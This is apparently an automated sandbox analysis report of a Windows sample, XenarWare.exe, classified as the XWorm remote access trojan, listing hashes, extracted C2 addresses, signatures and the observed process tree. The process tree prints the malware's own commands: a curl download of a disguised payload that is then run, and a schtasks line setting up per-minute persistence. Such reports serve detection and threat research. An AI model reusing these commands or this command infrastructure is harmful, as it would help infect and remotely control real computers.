Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240412-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    17/04/2024, 03:19

General

  • Target

    XenarWare.exe

  • Size

    59KB

  • MD5

    88f95b4a2d5af8ee7893a11abecb6ace

  • SHA1

    5c349881da20c6ad25d7eabeaa41d1ae2d2ad8f2

  • SHA256

    af67708e9be6571551147ff1840a555cadd1ea0150a91001e00904a8cc7881b6

  • SHA512

    996fb4ec5a81648a2e5b706d95185b0ae73c65744a146e70bf06db076882474fc677a9095430ecbda108cbc6357ae3de4a1407eafd3a7a9e915f11476eaa0c20

  • SSDEEP

    1536:ZrPJVKjbcknWSOYvTfkWkFM79yQVo5hWyZM+c:ZLJMjbcHDdMwQKDW7

Malware Config

Extracted

Family

xworm

Version

5.0

C2

127.0.0.1:23638

209.25.140.1:5525:23638

bring-recorder.gl.at.ply.gg:23638

action-yesterday.gl.at.ply.gg:23638

147.185.221.19:23638

then-wheel.gl.at.ply.gg::23638

then-wheel.gl.at.ply.gg:23638

teen-modes.gl.at.ply.gg:23638

Mutex

sk3UbSOs3RzNpgph

Attributes
  • Install_directory

    %LocalAppData%

  • install_file

    uwumonster.exe

aes.plain

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 4 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\XenarWare.exe
    "C:\Users\Admin\AppData\Local\Temp\XenarWare.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1312
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2896.tmp\2897.tmp\2898.bat C:\Users\Admin\AppData\Local\Temp\XenarWare.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2108
      • C:\Windows\system32\chcp.com
        chcp 65001
        3⤵
          PID:1404
        • C:\Windows\system32\curl.exe
          curl https://cdn.glitch.global/52845225-8ba1-4c7a-8921-b35d932319d9/yar.mp4?v=1713321691381 --output "C:\Users\Admin\AppData\Local\yar.wow"
          3⤵
            PID:888
          • C:\Users\Admin\AppData\Local\yar.wow
            C:\Users\Admin\AppData\Local\yar.wow
            3⤵
            • Checks computer location settings
            • Drops startup file
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4320
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "uwumonster" /tr "C:\Users\Admin\AppData\Local\uwumonster.exe"
              4⤵
              • Creates scheduled task(s)
              PID:5008
      • C:\Users\Admin\AppData\Local\uwumonster.exe
        C:\Users\Admin\AppData\Local\uwumonster.exe
        1⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2012
      • C:\Users\Admin\AppData\Local\uwumonster.exe
        C:\Users\Admin\AppData\Local\uwumonster.exe
        1⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:5040
      • C:\Users\Admin\AppData\Local\uwumonster.exe
        C:\Users\Admin\AppData\Local\uwumonster.exe
        1⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4336

      Network

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\uwumonster.exe.log

        Filesize

        654B

        MD5

        2ff39f6c7249774be85fd60a8f9a245e

        SHA1

        684ff36b31aedc1e587c8496c02722c6698c1c4e

        SHA256

        e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

        SHA512

        1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

      • C:\Users\Admin\AppData\Local\Temp\2896.tmp\2897.tmp\2898.bat

        Filesize

        2KB

        MD5

        51737caef60bc780cc1493e2a402ecfa

        SHA1

        26939c4fcc49b780ad4ef1023e8b12714417d0d5

        SHA256

        83897f7fd4fcf3800460c570c15546f40dd62ce6d4859c6cb60573c2e9afb1de

        SHA512

        0191edf228646a36dbda406000f717056c3b0227a9c233906b99b378a3ee09173caa3f2a68ced100028ae07e8931868d44368e5d77f24cd7dee9a73f6dedd6a5

      • C:\Users\Admin\AppData\Local\yar.wow

        Filesize

        36KB

        MD5

        830cb7605a79c2b4de44073684b0ea84

        SHA1

        d06b0b2cbf859612122c53e170ad96ac75dade04

        SHA256

        75d1a4db620da708121fa7496cbf73b32c45d3c521c2f5fa4c86acc93ba65df8

        SHA512

        9a0747aa726a76d123134d393eacce76651d3ecf6b6ec53c415f48ee00f890018eb391bfb425a4491ae2fc055fc16695d656589ebdd69d68b54d35b2883ba321

      • memory/1312-0-0x0000000140000000-0x0000000140028000-memory.dmp

        Filesize

        160KB

      • memory/1312-14-0x0000000140000000-0x0000000140028000-memory.dmp

        Filesize

        160KB

      • memory/2012-22-0x00007FFA6D9F0000-0x00007FFA6E4B1000-memory.dmp

        Filesize

        10.8MB

      • memory/2012-20-0x00007FFA6D9F0000-0x00007FFA6E4B1000-memory.dmp

        Filesize

        10.8MB

      • memory/4320-19-0x000000001B710000-0x000000001B720000-memory.dmp

        Filesize

        64KB

      • memory/4320-16-0x00007FFA6D9F0000-0x00007FFA6E4B1000-memory.dmp

        Filesize

        10.8MB

      • memory/4320-13-0x000000001B710000-0x000000001B720000-memory.dmp

        Filesize

        64KB

      • memory/4320-8-0x00007FFA6D9F0000-0x00007FFA6E4B1000-memory.dmp

        Filesize

        10.8MB

      • memory/4320-7-0x0000000000B50000-0x0000000000B60000-memory.dmp

        Filesize

        64KB

      • memory/4336-41-0x00007FFA6D9F0000-0x00007FFA6E4B1000-memory.dmp

        Filesize

        10.8MB

      • memory/4336-42-0x00007FFA6D9F0000-0x00007FFA6E4B1000-memory.dmp

        Filesize

        10.8MB

      • memory/5040-32-0x00007FFA6D9F0000-0x00007FFA6E4B1000-memory.dmp

        Filesize

        10.8MB

      • memory/5040-33-0x00007FFA6D9F0000-0x00007FFA6E4B1000-memory.dmp

        Filesize

        10.8MB